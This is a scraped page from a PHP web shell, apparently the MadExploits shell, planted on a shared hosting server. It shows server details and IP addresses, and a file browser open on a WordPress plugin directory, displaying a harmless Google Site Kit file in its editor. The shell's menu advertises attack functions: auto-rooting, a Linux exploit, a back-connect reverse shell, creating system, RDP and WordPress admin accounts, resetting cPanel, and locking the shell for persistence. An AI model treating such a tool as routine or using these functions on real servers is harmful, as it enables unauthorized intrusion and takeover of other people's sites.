Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.191.240.171
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Reader_Revenue_Manager /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings.php
3.28
KB
-rw-r--r--
Tag_Guard.php
886
B
-rw-r--r--
Tag_Matchers.php
984
B
-rw-r--r--
Web_Tag.php
2.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tag_Guard.php
<?php /** * Class Google\Site_Kit\Modules\Reader_Revenue_Manager\Tag_Guard * * @package Google\Site_Kit\Modules\Reader_Revenue_Manager * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Reader_Revenue_Manager; use Google\Site_Kit\Core\Modules\Tags\Module_Tag_Guard; /** * Class for the Reader Revenue Manager tag guard. * * @since 1.132.0 * @access private * @ignore */ class Tag_Guard extends Module_Tag_Guard { /** * Determines whether the guarded tag can be activated or not. * * @since 1.132.0 * * @return bool|WP_Error TRUE if guarded tag can be activated, otherwise FALSE or an error. */ public function can_activate() { $settings = $this->settings->get(); return ! empty( $settings['publicationID'] ); } }
Close